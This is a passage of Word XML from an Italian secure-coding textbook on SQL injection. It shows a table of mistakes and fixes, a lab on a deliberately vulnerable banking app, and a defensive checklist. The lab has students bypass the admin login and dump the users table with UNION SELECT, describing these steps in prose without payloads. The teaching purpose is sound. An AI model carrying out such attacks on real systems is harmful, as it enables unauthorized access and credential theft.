              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Costruzione di query</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">IN (...)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">con stringhe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SQLi nel</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">IN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Generare il numero giusto di</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">?</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">dinamicamente:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">f"... IN ({','.join(['?']*len(valori))})"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Filtraggio</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">“</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">manuale</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">di apici e parole chiave</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Falsa sicurezza, bypass facili</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Eliminare il filtro, usare parametriche</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Uso di un ORM ma con</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">query.from_statement(text(...))</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">per SQL raw</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Reintroduce SQLi nello SQL raw</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Usare i metodi dell’ORM, oppure parametrizzare lo SQL raw</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Errori SQL stampati al pubblico (stack trace, query reale)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Aiuta l’attaccante</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Modalità produzione: errori generici al client, dettagli solo nei log</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Account DB della webapp con privilegi</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Compromissione totale a ogni SQLi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Account dedicato, permessi minimi sulle sole tabelle necessarie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="240"/>
    <w:bookmarkStart w:id="245" w:name="laboratorio-finale-bancapiccola-completa"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="507" w:name="sec_5_12"/>
      <w:r>
        <w:t xml:space="preserve">5.12 Laboratorio finale: BancaPiccola completa</w:t>
      </w:r>
      <w:bookmarkEnd w:id="507"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ℹ️ Il repository</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">BancaPiccola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">completo verrà rilasciato dal docente sul repository del corso (</w:t>
      </w:r>
      <w:hyperlink r:id="rId39">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/ss4i/BancaPiccola</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">) man mano che procediamo nei capitoli. Le istruzioni sotto presuppongono che il repository sia disponibile. Se non lo è ancora, ripeti gli esercizi delle sezioni 5.5 e 5.6 sul tuo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">come allenamento equivalente.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="241" w:name="setup-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Da terminale, nella cartella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">corso-sicurezza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con ambiente virtuale attivo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId34">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/ss4i/BancaPiccola.git</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cd BancaPiccola/BancaPiccola-vuln</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install -r requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python app.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri il browser su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId31">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="241"/>
    <w:bookmarkStart w:id="242" w:name="obiettivi-del-laboratorio"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Obiettivi del laboratorio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sull’applicazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BancaPiccola-vuln</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">devi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1099"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Attacco 1 — Login bypass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: entrare nel sistema come l’utente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">senza conoscere la password. Suggerimento: usa una delle stringhe della </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec_5_5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">sezione 5.5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1099"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Attacco 2 — Esfiltrazione completa della tabella utenti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: dalla pagina di ricerca prodotti, recuperare username e password (e tutti gli altri campi) di tutti gli utenti registrati. Suggerimento: usa UNION SELECT come nella </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec_5_6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">sezione 5.6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1099"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Attacco 3 — Accesso ai dati altrui senza login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: trovare un terzo endpoint vulnerabile che permetta di leggere informazioni che non dovresti vedere senza autenticazione (consulta il README del repository per indizi).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per ogni attacco,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">documenta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- L’URL o la richiesta esatta che hai usato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- L’output ottenuto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Quale parte del codice del server è vulnerabile (apri i sorgenti)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="242"/>
    <w:bookmarkStart w:id="243" w:name="correzione"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Correzione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BancaPiccola-vuln/app.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e correggi tutte e tre le vulnerabilità SQL Injection che hai sfruttato. Salva, riavvia, riprova gli stessi attacchi: devono fallire tutti. Quando ce l’hai fatta, confronta il tuo codice corretto con quello in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BancaPiccola-secure/app.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per verificare di aver applicato le difese giuste e per vedere come il docente ha risolto.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="243"/>
    <w:bookmarkStart w:id="244" w:name="estensione-per-chi-finisce-in-fretta"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Estensione (per chi finisce in fretta)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aggiungi una difesa in profondità: configura SQLite con un utente che abbia solo permessi di SELECT su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">prodotti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e niente sulle altre tabelle. (SQLite ha controlli di permessi limitati: per fare bene questo esercizio, considera la migrazione a PostgreSQL — vedrai a Basi di Dati 2 come si fa.) In alternativa, aggiungi al login un meccanismo di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">rate limiting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(massimo 5 tentativi per IP in 15 minuti) usando la libreria</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flask-limiter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="244"/>
    <w:bookmarkEnd w:id="245"/>
    <w:bookmarkStart w:id="246" w:name="checklist-operativa-sql-injection"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="508" w:name="sec_5_13"/>
      <w:r>
        <w:t xml:space="preserve">5.13 Checklist operativa SQL Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="508"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Da tenere accanto al monitor mentre programmi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1100"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Mai concatenazione di input</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in stringhe SQL (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">f"..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.format()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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1100"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sempre parametri</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nel secondo argomento di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">execute()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cur.execute("... WHERE x=?", (val,))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1100"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Anche nei numeri</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cur.execute("... WHERE id=?", (int(id_utente),))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1100"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Anche nei LIKE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: parametro =</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">f"%{q}%"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, query =</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"... LIKE ?"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1100"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Anche nei ORDER BY dinamici</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: whitelist hard-coded di nomi colonna ammessi (i parametri non funzionano per nomi di tabelle/colonne)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1100"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Validare il tipo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dell’input prima della query (tentare conversione a int, validazione email, ecc.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1100"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Nessun errore SQL al pubblico</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in produzione:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">app.run(debug=False)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, gestione errori che restituisce 500 generici</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1100"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Account DB con privilegi minimi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: mai</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1100"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Log degli errori SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in un sistema centralizzato; allarme se la frequenza è anomala</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1100"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Code review specifico</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: chiunque tocchi codice con SQL deve far rivedere il diff a un secondo paio di occhi, focalizzato sulla SQLi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="246"/>
